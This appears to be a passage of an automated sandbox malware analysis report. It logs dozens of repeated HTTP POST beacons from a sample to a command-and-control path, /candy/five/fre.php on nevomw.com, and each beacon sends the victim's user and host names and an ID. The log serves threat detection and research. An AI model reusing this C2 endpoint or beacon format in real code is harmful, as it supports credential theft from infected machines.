                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.056588888 CET1660OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:24.134993076 CET1661INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            222192.168.2.64997245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:24.413582087 CET1662OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.465447903 CET1662OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:24.556477070 CET1662INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            223192.168.2.64997345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:24.870784044 CET1663OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.924897909 CET1663OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.002434015 CET1664INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            224192.168.2.64997445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:25.288194895 CET1665OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:25.340574980 CET1665OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.414858103 CET1665INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            225192.168.2.64997545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:25.721544027 CET1666OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:25.773643017 CET1666OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.849072933 CET1667INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            226192.168.2.64997645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:26.144787073 CET1668OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:26.197416067 CET1668OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:26.272979021 CET1668INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            227192.168.2.64997745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:26.570982933 CET1669OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:26.625888109 CET1669OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:26.711049080 CET1670INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            228192.168.2.64997845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:27.002604008 CET1670OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.054647923 CET1671OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.132330894 CET1671INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            229192.168.2.64997945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:27.439599991 CET1672OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.493242979 CET1672OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.568900108 CET1673INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            23192.168.2.64973745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:52.880419970 CET145OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.938637018 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.017894030 CET147INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            230192.168.2.64998045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:27.844926119 CET1673OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.897897005 CET1674OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.972228050 CET1674INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            231192.168.2.64998145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:28.210752964 CET1675OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:28.263191938 CET1675OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:28.339982986 CET1675INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            232192.168.2.64998245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:28.648578882 CET1676OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:28.707230091 CET1677OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:28.783734083 CET1677INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            233192.168.2.64998345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:29.097569942 CET1678OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.151492119 CET1678OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:29.229926109 CET1679INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            234192.168.2.64998445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:29.481369019 CET1679OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.534396887 CET1680OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:29.611299992 CET1680INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            235192.168.2.64998545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:29.882165909 CET1681OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.941138983 CET1681OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.031088114 CET1681INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            236192.168.2.64998645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:30.266581059 CET1682OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:30.319520950 CET1683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.405565977 CET1683INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            237192.168.2.64998745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:30.691282034 CET1684OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:30.743802071 CET1684OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.819380999 CET1684INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            238192.168.2.64998845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:31.074450016 CET1685OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:31.137681007 CET1686OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:31.217477083 CET1686INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            239192.168.2.64998945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:31.527811050 CET1687OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
